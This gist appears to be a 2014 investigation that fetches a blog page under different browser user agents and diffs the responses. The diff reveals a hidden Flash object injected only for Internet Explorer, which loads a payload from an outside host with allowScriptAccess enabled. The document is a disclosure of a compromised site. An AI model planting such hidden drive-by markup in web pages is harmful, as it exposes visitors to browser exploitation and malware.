Skip to content

Instantly share code, notes, and snippets.

Created Dec 12, 2014
Embed
What would you like to do?
IE flash injection
$ wget --header="Accept: text/html" --user-agent="Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0" -O ff.html http://www.shamusyoung.com/twentysidedtale/\?p\=25340
$ wget --header="Accept: text/html" --user-agent="Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" -O ie10.html http://www.shamusyoung.com/twentysidedtale/\?p\=25340
$ wget --header="Accept: text/html" --user-agent="Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" -O ie11.html http://www.shamusyoung.com/twentysidedtale/\?p\=25340
$ diff ff.html ie10.html
# ..some lines snipped
+</script> <body><div style = "position: absolute;z-index:-1; left:200px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;">
+<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="EITest" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="40" height="40" align="middle" >
+<param name="allowScriptAccess" value="always"/>
+<param name="movie" value="http://avimutap.uk.to/player.php?pid=4540AAB280B6331D63B613F171C670700DA80AFAEEF1752C1A2F5EC907BC77F5CA83"/>
+<param name="quality" value="high"/>
+<param name="FlashVars" value="css=2&id=cxkowvcr0wm0vq1xkfgq0rjrAkf%3F6762CCD4%3A2D8553F85D835H393E892922FC%3A2CHCGGH3974E3C4H7GE%3B29DE99H7EC%3A5" />
+<param name="bgcolor" value="#ffffff"/>
+<param name="wmode" value="opaque"/>
+<embed src="http://avimutap.uk.to/player.php?pid=4540AAB280B6331D63B613F171C670700DA80AFAEEF1752C1A2F5EC907BC77F5CA83" quality="high" bgcolor="#ffffff" name="EITest" FlashVars="css=2&id=cxkowvcr0wm0vq1xkfgq0rjrAkf%3F6762CCD4%3A2D8553F85D835H393E892922FC%3A2CHCGGH3974E3C4H7GE%3B29DE99H7EC%3A5" width="40" height="40" align="middle" allowScriptAccess="always" play="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="opaque"/>
+</object>
+</div></body>
+</body></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment